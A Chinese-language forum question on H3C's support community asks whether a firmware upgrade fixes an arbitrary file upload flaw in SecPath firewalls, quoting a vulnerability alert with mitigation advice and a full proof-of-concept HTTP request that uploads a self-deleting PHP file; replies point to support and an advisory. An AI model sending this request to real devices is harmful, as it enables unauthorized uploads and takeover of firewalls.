• 全部
  • 经验案例
  • 典型配置
  • 技术公告
  • FAQ
  • 漏洞说明
  • 全部
  • 全部
  • 大数据引擎
  • 知了引擎
产品线
搜索
取消
案例类型
发布者
是否解决
是否官方
时间
搜索引擎
匹配模式
高级搜索

防火墙漏洞

2024-08-13提问
  • 0关注
  • 0收藏,666浏览
粉丝:0人 关注:0人

问题描述:

设备是F1000-AK1030,升级到最新版本能解决以下问题吗?

 

【漏洞预警】H3C-SecPath下一代防火墙local_cert_delete_both存在任意文件上传

 

1.产品介绍:

     H3C SecPath防火墙面向行业市场的高性能多千兆和超万兆防火墙VPN集成网关产品,硬件上基于多核多线程MIPS/ARM处理器+ASIC硬件架构,为1U的独立盒式防火墙。该系列防火墙产品提供丰富的接口扩展能力,设备同时支持Telemetry和Netconf网络扩展协议,能够适应多种网络部署要求。作为NGFW产品,丰富的审计功能是必不可少的,所以产品系列可以扩展大容量硬盘,同时增加硬盘后还可以有效支持web缓冲等应用加速功能。

 

2.漏洞描述:

    H3C SecPath 下一代防火墙 存在任意文件上传漏洞,攻击者通过漏洞获取服务器权限。

 

3.影响版本:

H3C iMC产品

 

 

4.安全设备规则防护建议及修复建议:

 

(1). 目前官方已发布漏洞修复补丁,及时联系厂商获取最新补丁进行升级:https://www.h3c.com/

(2). 临时防护解决方案,在不影响业务的情况下配置URL访问控制策略,在WAF上添加拦截规则:POST请求,请求路径包含(local_cert_delete_both)

(3). 限制访问来源地址,如非必要,不要将系统开放在互联网上。

(4). 更新您的安全设备的规则库和软件版本,以确保能够有效防护新出现的威胁。

 

 

5. POC:

POST /webui/?g=local_cert_delete_both HTTP/1.1

Host: xx.xx.xx.xx

Accept-Encoding: identity

Content-Length: 345

Accept-Language: zh-CN,zh;q=0.8

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

Connection: keep-alive

Referer: http://www.baidu.com

Cache-Control: max-age=0

Content-Type: multipart/form-data; boundary=ed63f728755e4a2f90d094ec09b0ed9a

 

--ed63f728755e4a2f90d094ec09b0ed9a

Content-Disposition: form-data; name="submit_post"

 

local_cert_import

--ed63f728755e4a2f90d094ec09b0ed9a

Content-Disposition: form-data; name="key_file_name"; filename="QyFlQF.php"

Content-Type: text/plain

 

<?php echo md5('OmwiBdiyupqeAlMJ');@unlink(__file__);?>

--ed63f728755e4a2f90d094ec09b0ed9a--

最佳答案

粉丝:237人 关注:8人

联系400确认或者升级下最新版本在扫描试试

2 个回答
粉丝:336人 关注:0人

您好,建议咨询办事处

粉丝:33人 关注:0人

目前v7版本的防火墙设备不涉及这个漏洞

回复在路上 :

涉及的只有这几个设备https://www.h3c.com/cn/Service/Online_Help/psirt/security-notice/detail_2021.htm?Id=136

zhang同学 发表时间:2024-08-14 更多>>

客户现场网络中扫描到华三防火墙有这个漏洞,防火墙版本都是V7的,

在路上 发表时间:2024-08-13
回复在路上 :

涉及的只有这几个设备https://www.h3c.com/cn/Service/Online_Help/psirt/security-notice/detail_2021.htm?Id=136

zhang同学 发表时间:2024-08-14

编辑答案

你正在编辑答案

如果你要对问题或其他回答进行点评或询问,请使用评论功能。

分享扩散:

提出建议

    +

亲~登录后才可以操作哦!

确定

亲~检测到您登陆的账号未在http://hclhub.h3c.com进行注册

注册后可访问此模块

跳转hclhub

你的邮箱还未认证,请认证邮箱或绑定手机后进行当前操作

举报

×

侵犯我的权益 >
对根叔社区有害的内容 >
辱骂、歧视、挑衅等(不友善)

侵犯我的权益

×

泄露了我的隐私 >
侵犯了我企业的权益 >
抄袭了我的内容 >
诽谤我 >
辱骂、歧视、挑衅等(不友善)
骚扰我

泄露了我的隐私

×

您好,当您发现根叔知了上有泄漏您隐私的内容时,您可以向根叔知了进行举报。 请您把以下内容通过邮件发送到pub.zhiliao@h3c.com 邮箱,我们会尽快处理。
  • 1. 您认为哪些内容泄露了您的隐私?(请在邮件中列出您举报的内容、链接地址,并给出简短的说明)
  • 2. 您是谁?(身份证明材料,可以是身份证或护照等证件)

侵犯了我企业的权益

×

您好,当您发现根叔知了上有关于您企业的造谣与诽谤、商业侵权等内容时,您可以向根叔知了进行举报。 请您把以下内容通过邮件发送到 pub.zhiliao@h3c.com 邮箱,我们会在审核后尽快给您答复。
  • 1. 您举报的内容是什么?(请在邮件中列出您举报的内容和链接地址)
  • 2. 您是谁?(身份证明材料,可以是身份证或护照等证件)
  • 3. 是哪家企业?(营业执照,单位登记证明等证件)
  • 4. 您与该企业的关系是?(您是企业法人或被授权人,需提供企业委托授权书)
我们认为知名企业应该坦然接受公众讨论,对于答案中不准确的部分,我们欢迎您以正式或非正式身份在根叔知了上进行澄清。

抄袭了我的内容

×

原文链接或出处

诽谤我

×

您好,当您发现根叔知了上有诽谤您的内容时,您可以向根叔知了进行举报。 请您把以下内容通过邮件发送到pub.zhiliao@h3c.com 邮箱,我们会尽快处理。
  • 1. 您举报的内容以及侵犯了您什么权益?(请在邮件中列出您举报的内容、链接地址,并给出简短的说明)
  • 2. 您是谁?(身份证明材料,可以是身份证或护照等证件)
我们认为知名企业应该坦然接受公众讨论,对于答案中不准确的部分,我们欢迎您以正式或非正式身份在根叔知了上进行澄清。

对根叔社区有害的内容

×

垃圾广告信息
色情、暴力、血腥等违反法律法规的内容
政治敏感
不规范转载 >
辱骂、歧视、挑衅等(不友善)
骚扰我
诱导投票

不规范转载

×

举报说明